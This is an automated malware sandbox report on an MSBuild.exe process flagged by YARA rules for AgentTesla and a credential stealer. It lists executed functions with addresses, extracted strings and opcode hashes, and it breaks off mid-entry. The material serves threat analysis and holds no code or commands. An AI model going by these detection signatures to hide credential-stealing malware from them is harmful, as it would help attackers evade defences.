Target ID:	13
Start time:	21:26:55
Start date:	25/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xac0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4073894024.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	61.5%
Total number of Nodes:	26
Total number of Limit Nodes:	0

Executed Functions

Function 01192440 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*xZ4, xrefs: 011925D9
Te^q, xrefs: 011924A9
fan, xrefs: 011925BD
fan, xrefs: 011925B6
Te^q, xrefs: 01192654

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: *xZ4$Te^q$Te^q$fan$fan
API String ID: 0-1604782859
Opcode ID: 4433483661d974ab17a86420a2b933e134c7b4c678b2d463cbf4ce5227ce8675
Instruction ID: a8c4f6bc607a6bfefd8b88d5eaa95b3533c201003113ede0ed120f65af6612df
Opcode Fuzzy Hash: 4433483661d974ab17a86420a2b933e134c7b4c678b2d463cbf4ce5227ce8675
Instruction Fuzzy Hash: D081B274E002199FDB08CFAAC995AAEFBB2FF88300F14942AD515BB364D7349905CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0119C090 Relevance: 5.5, Strings: 4, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0119C79E
$^q, xrefs: 0119C5B2
$^q, xrefs: 0119C59C
$^q, xrefs: 0119C788

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0f80852ebc9a9111c58b94f5c221d1b77bf4a7fbf8ce2c8ee366abb889d39fbd
Instruction ID: ca5fe7ee0050d62dadbc636f3fe752001f9b0349e44da35139675f0a530b7cc6
Opcode Fuzzy Hash: 0f80852ebc9a9111c58b94f5c221d1b77bf4a7fbf8ce2c8ee366abb889d39fbd
Instruction Fuzzy Hash: 59221574E04219CFDB58CFA9C984B9DBBB2BB88300F10C4AAD45ABB354DB345A81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 011923BC Relevance: 5.2, Strings: 4, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*xZ4, xrefs: 011925D9
Te^q, xrefs: 011924A9
fan, xrefs: 011925BD
Te^q, xrefs: 01192654

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: *xZ4$Te^q$Te^q$fan
API String ID: 0-1644141099
Opcode ID: fa8dd3366f5ed1d89a4326239bb1d03def8f2f7b83c1ce5b69cd199f23f1ebf5
Instruction ID: 575a4aed561d2986bd8f854c76ed809cb2b779ab26e4d52e70121dac58845b7b
Opcode Fuzzy Hash: fa8dd3366f5ed1d89a4326239bb1d03def8f2f7b83c1ce5b69cd199f23f1ebf5
Instruction Fuzzy Hash: 6DA13474E01259CFDB09CFB9C8906DEBBB2FF89304F24806AD855AB264D735A906CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01192430 Relevance: 5.2, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*xZ4, xrefs: 011925D9
Te^q, xrefs: 011924A9
fan, xrefs: 011925BD
Te^q, xrefs: 01192654

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: *xZ4$Te^q$Te^q$fan
API String ID: 0-1644141099
Opcode ID: 0111b2dc031d6b428a806cbfb8ebc2d3cd51682b8c0da205eef0fa4607a155ca
Instruction ID: 1284d791e43df548fb2456dedb753a1bf6fa0fa4c6c9ee99f0f34e34f3b4b03c
Opcode Fuzzy Hash: 0111b2dc031d6b428a806cbfb8ebc2d3cd51682b8c0da205eef0fa4607a155ca
Instruction Fuzzy Hash: D581C374E042199FDB08CFAAC994AEEFBB2FF88300F14842AD915AB358D7349905CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0119BAF0 Relevance: 2.8, Strings: 2, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Q4I, xrefs: 0119BDC1
Q4I, xrefs: 0119BDC8

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Q4I$Q4I
API String ID: 0-3560053718
Opcode ID: c7bff6d0f1a41c0fb1454591660beacc6e3e19d5e80d6b3cad7b4ec7d7008634
Instruction ID: c153d4c9d0e538cb12b299bfcfa2626ef4d84611da981ed0046bc1540ce47b35
Opcode Fuzzy Hash: c7bff6d0f1a41c0fb1454591660beacc6e3e19d5e80d6b3cad7b4ec7d7008634
Instruction Fuzzy Hash: DAB15C70D18228CFDF18CFA5E584A9DBBB1FF49304F108569D52ABB254DB389941CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 0119B0BC Relevance: 1.6, APIs: 1, Instructions: 103
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0119B7AD

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 16c7e6f24e8e069c58cb1472669cad9e6558f37a868e3da4e9b608e0a9cf9c8f
Instruction ID: 894ab056dd8b5ec1182ff305cc536381619ee47695018d7885da1070abb0a522
Opcode Fuzzy Hash: 16c7e6f24e8e069c58cb1472669cad9e6558f37a868e3da4e9b608e0a9cf9c8f
Instruction Fuzzy Hash: 5C4168B9D04258DFCF14CFA9E984A9EFBB1BB19310F10902AE824B7310D335A945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 01199F88 Relevance: 1.4, Strings: 1, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ELd, xrefs: 01199FD7

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ELd
API String ID: 0-357188618
Opcode ID: 775cde1e71174116ad289a4c90ea2ebc899c06e815a91ac96667a9bac419af33
Instruction ID: 816ca5ba080f08a4b7e85eafa0727cb7a13bfd85d22448b559fe22fbe7a9b82f
Opcode Fuzzy Hash: 775cde1e71174116ad289a4c90ea2ebc899c06e815a91ac96667a9bac419af33
Instruction Fuzzy Hash: E861F4B4D00208DFDB08DFA9E58969DBBB2FF88301F14C06AD416AB354DB345A45CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01199F77 Relevance: 1.4, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ELd, xrefs: 01199FD7

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ELd
API String ID: 0-357188618
Opcode ID: d997543e6f86b4f060122962ae6b06cd625622b21c5f361e0d1ba0ce64f78aa9
Instruction ID: 8676969e7860e1fabfe7305a64e8874a8ee38df4c1be468d5b7ee3b1fd3b8897
Opcode Fuzzy Hash: d997543e6f86b4f060122962ae6b06cd625622b21c5f361e0d1ba0ce64f78aa9
Instruction Fuzzy Hash: F361E7B4E01208DFDB48CFA5E59969DBBB2FF88301F14C46AD816AB354DB385A45CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01196D08 Relevance: 1.3, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p, xrefs: 01196D7D

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: cdf1f22a3755303beb94ab7708d7837b122962a9dad85130ddecc77a57524134
Instruction ID: 3ad443515f3854e6fb8ae3d75bda838359fba7601b41060266f4d46111b15854
Opcode Fuzzy Hash: cdf1f22a3755303beb94ab7708d7837b122962a9dad85130ddecc77a57524134
Instruction Fuzzy Hash: 3521A871E016189BEB5CCFABD94069EFBF7AFC8200F04C1B6D518A6264EB3419468F51

Uniqueness

Uniqueness Score: -1.00%

Function 011944C9 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37642a6876ed76f4e8fa9ce062e8b7861a7c067ebfb64e1603bbe4c808cf5d0b
Instruction ID: 87acb3c6b75a076de21a9a88ed92fcb8820e9d5f2bd884d8a265abdb6b291e4c
Opcode Fuzzy Hash: 37642a6876ed76f4e8fa9ce062e8b7861a7c067ebfb64e1603bbe4c808cf5d0b
Instruction Fuzzy Hash: EBC15A70D0520ADFDB08CFA9D5814AEFBB2FF89300B14D56AD426AB614E734E942CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01194518 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d462802236691dc416fdf68815d637a9d39c5cc0537f3cd6509f6bfbe1165df1
Instruction ID: bb32bec0cf5ea8ae1540ec4f99b5a401b74c43209be1d1c1d2a44d30dfbec593
Opcode Fuzzy Hash: d462802236691dc416fdf68815d637a9d39c5cc0537f3cd6509f6bfbe1165df1
Instruction Fuzzy Hash: D2C13870D0520ADFDF08CFA6D5818AEFBB2FF89340B14D529D426AB614E734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 011947C8 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b87f9dc8eb0ac0dc31d0e60c0c7fdebce9338d119089af5fba96d1225a6f9981
Instruction ID: 265d35aff44c47b80398caaf35f9c4a4b140dd069a784311ebcb11d074606199
Opcode Fuzzy Hash: b87f9dc8eb0ac0dc31d0e60c0c7fdebce9338d119089af5fba96d1225a6f9981
Instruction Fuzzy Hash: 57A14970D0520ADFDF08CF99D5818AEFBB2FF89340B159556D426AB614E334D942CF91

Uniqueness

Uniqueness Score: -1.00%

Function 011946A3 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e13797ac352e273c0315c91ea2745c7a55b53ee6b0f73807d4a2a35d7bf8a54b
Instruction ID: 2737279b9e55c9e885183308640b218fdbccc03e9f7f313f91a41bc9549b4fa5
Opcode Fuzzy Hash: e13797ac352e273c0315c91ea2745c7a55b53ee6b0f73807d4a2a35d7bf8a54b
Instruction Fuzzy Hash: BEA13870D0520ADFDF08CFA5D6818AEFBB2FF49340B159525D426AB614E334E982CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01194905 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde4709e2955d735500fa4bba2028498877a12695f07c1f0030b446616c78c58
Instruction ID: 872afeeab34c8bda29d5cac1dc80e7821bd3d295a38a986d5000c3ce9bc1b207
Opcode Fuzzy Hash: fde4709e2955d735500fa4bba2028498877a12695f07c1f0030b446616c78c58
Instruction Fuzzy Hash: 8DA11770E0520ADFDF08CFA5D2814AEFBB2FF89340B159526D526AB614E334E942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01194857 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69caed56058dbc9c841c256b4f504991c3785b44d9d825cde2b1e4eabade4749
Instruction ID: bb65cc44db3591f3d78032ff08948bf0a54b17b06592eedee688488138fde14b
Opcode Fuzzy Hash: 69caed56058dbc9c841c256b4f504991c3785b44d9d825cde2b1e4eabade4749
Instruction Fuzzy Hash: 2DA117B0D0520ADFDF08CF95D2818AEFBB2FF49340B159526D426AB614E334E982CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0119B4A8 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b1eb97a4a7b10c313b0ec08c614002d5c3ea6eba0db3089b380c7291004e80
Instruction ID: 7b24689a0636e872953c64ee802baba3a3cd55f01d659763d3ba82920a715bac
Opcode Fuzzy Hash: 64b1eb97a4a7b10c313b0ec08c614002d5c3ea6eba0db3089b380c7291004e80
Instruction Fuzzy Hash: 5E511870E04619CBDF18CFA9D9409DDFBB6FF89300F24862AD529A7214EB70A946CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01192BB0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd78f2c9ad4909cde902074ead80ff5a1708a396634801e5425b28d4d9c29351
Instruction ID: 5e892e69431145d0bcece8dbb6cfdc5871827db9633240c5d9a23f5986d53932
Opcode Fuzzy Hash: cd78f2c9ad4909cde902074ead80ff5a1708a396634801e5425b28d4d9c29351
Instruction Fuzzy Hash: FC5116B4E056099FDB08CFAAD5416AEFBF2EF8C310F24D02AD419B7254D7349A41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01192BC0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826e54fdf8852cec7e6590e59669595f25a132b7779c6275584e862b5aaef02f
Instruction ID: 98261a2bb9d71b37394dece25735ed43df4234aa5e38c64f7924589bc924b1b3
Opcode Fuzzy Hash: 826e54fdf8852cec7e6590e59669595f25a132b7779c6275584e862b5aaef02f
Instruction Fuzzy Hash: D05119B4E05609DFDB08CFAAD4416AEFBF2EF8C300F14D02AD419B7254D7349A418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 011935B0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74fb0384bb4e415ef3f603369763a62de02b4857f7e99b61eeec438b45840b56
Instruction ID: 4e3be6cc29cdbdba6760b6dc0a5d4138bb158cb43f0d9737372d34d695baad9c
Opcode Fuzzy Hash: 74fb0384bb4e415ef3f603369763a62de02b4857f7e99b61eeec438b45840b56
Instruction Fuzzy Hash: 0B31D5B1E006188BEB18CFAAD8447DEBBB7AFC9310F14C06AD419A7258DB355A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 011935A0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61cc50d882050423941cd2f7e16a314279591b59bfccc4d8a2693dd781dcc212
Instruction ID: 2f321314b9f01d9b2c4672431772a1e57b22e6f44b8fba7ad8777e2a33f7e177
Opcode Fuzzy Hash: 61cc50d882050423941cd2f7e16a314279591b59bfccc4d8a2693dd781dcc212
Instruction Fuzzy Hash: 1721B6B1E006189BEB18CFABD94439EBFF3AFC8310F14C16AD418AA258DB7919458F51

Uniqueness

Uniqueness Score: -1.00%

Function 0119B134 Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNEL32(?), ref: 0119CC12

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 8fc04cce30bac524afe316306bbc98281b767f9855530d8a9c0e07665727f850
Instruction ID: d26e7e02577a2e7c13da4e5bf3d3eedbf7033206c451dcf27c5b1bc96d360c81
Opcode Fuzzy Hash: 8fc04cce30bac524afe316306bbc98281b767f9855530d8a9c0e07665727f850
Instruction Fuzzy Hash: B331A7B4D002489FCF18CFAAD584A9EFBF5AB49310F14906AE859B7220D734A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0105D06C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d590e40ef2d9e202e08674cdd61ed9a9a7e381bc33e06bcafd66f4137312b32
Instruction ID: 3ec091a1e7beceb1c8b6008f0db979966a0a6d8d7ebe6caebbfb79464ebb2b42
Opcode Fuzzy Hash: 2d590e40ef2d9e202e08674cdd61ed9a9a7e381bc33e06bcafd66f4137312b32
Instruction Fuzzy Hash: 05213671100200EFDB45DF94D9C4B1BBFA5FB88314F20C2AAED490B256C33AC456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0105D5C8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f951bf4bb187db7cddbbb45333787baf1bee5240b54e57363625a9f9ae4dd012
Instruction ID: 4f2d2616707b5bb1079ec48d39dbf9e5632c59a42d5e78f7315065888e19dc47
Opcode Fuzzy Hash: f951bf4bb187db7cddbbb45333787baf1bee5240b54e57363625a9f9ae4dd012
Instruction Fuzzy Hash: 262103B1500200DFDB45DF98D9C4B2BBFA5FB98318F2085AAED490B256C336D456C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0106D2F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ada7b5c5c954ccded0234ca02b15114d4001409e658268f7bfbab25c691bc4
Instruction ID: c1cf83deafcb9250712db26d1834a892517345a627e47a87c2b1e33b25c375a2
Opcode Fuzzy Hash: b0ada7b5c5c954ccded0234ca02b15114d4001409e658268f7bfbab25c691bc4
Instruction Fuzzy Hash: 3021F2B1604204DFDB05DF98D9C0B2ABBA9EB84314F24C5ADD8C94B256C37AD446CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0106D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72f9cebe68806f0e2e4022c855a52ff52eb1f2f32f22fb7309d12cc0b26ef80
Instruction ID: ba2ba8d658a6f8d0b7acb37511c9e1cd3891788ceec671edd351b7fd2f637600
Opcode Fuzzy Hash: e72f9cebe68806f0e2e4022c855a52ff52eb1f2f32f22fb7309d12cc0b26ef80
Instruction Fuzzy Hash: 3D212571604200DFEB15DF58D584B26BFA9EB84314F20C5ADE9C94B256C337D447CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0106D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe0e6ff06409d33a3a9d8136f76f66a7aac57eee0d47f83bb1a5666a8e912e0
Instruction ID: 5ad7dc7ec989b58cb3a40b9f89e4aedbb1f847dfa6dc446015163a649e0a5bee
Opcode Fuzzy Hash: ffe0e6ff06409d33a3a9d8136f76f66a7aac57eee0d47f83bb1a5666a8e912e0
Instruction Fuzzy Hash: 842187755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F667C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0105D067 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction ID: 6eb09e4e2430c00a4145f6cf1c94fbaf15ac1812ab47ebaa1efc96fabe78c5b2
Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction Fuzzy Hash: A021CD76404280EFDB46CF54D9C4B16BFB2FB88314F24C2AADD480B256C33AD426CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0105D5C3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: e9b7a13a3dd86889fd0ee28b763c69e3b9a896f5e4261e56235d0ce746acbf7b
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 6D11DF76404240CFCB52CF54D5C4B16BFA2FB98314F24C6AADC490B256C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0106D2EB Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: ce8749d37bc54293675eafdd0c57fd6d5675b202967b226c0cee4b18bf346b68
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: EC11DD75604280CFDB02CF58D5C4B15BFB1FB84318F28C6AAD8894B256C33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0105D92D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f5fcf8e47572370f2a3ad26918573e51fd5fdfc558670944fbf03f64e00f6b
Instruction ID: b17dd0450b8fffce8ac5ce1c66914bd3c22149b739c54720844ea7a71ccc4b18
Opcode Fuzzy Hash: c5f5fcf8e47572370f2a3ad26918573e51fd5fdfc558670944fbf03f64e00f6b
Instruction Fuzzy Hash: 020126710083409AE7918F6ACD8476BFFE9EF81724F08C46BED894A286C238D840C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0105D92C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c219c0ba9f040f72dd35d53728a37cfd76fcf1ae8c6b11edb6d932e3f2d1f90
Instruction ID: 9c0a8e0c62372c837cde7b215a1f703d55b7c6860ffefc8d6c5041860a80c4b8
Opcode Fuzzy Hash: 5c219c0ba9f040f72dd35d53728a37cfd76fcf1ae8c6b11edb6d932e3f2d1f90
Instruction Fuzzy Hash: 00F062714043449AE7518B1AD8C4B67FFE8EB85628F18C45AED884A286C2799844CB71

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01196880 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

Y5?>, xrefs: 01196AA9

Memory Dump Source

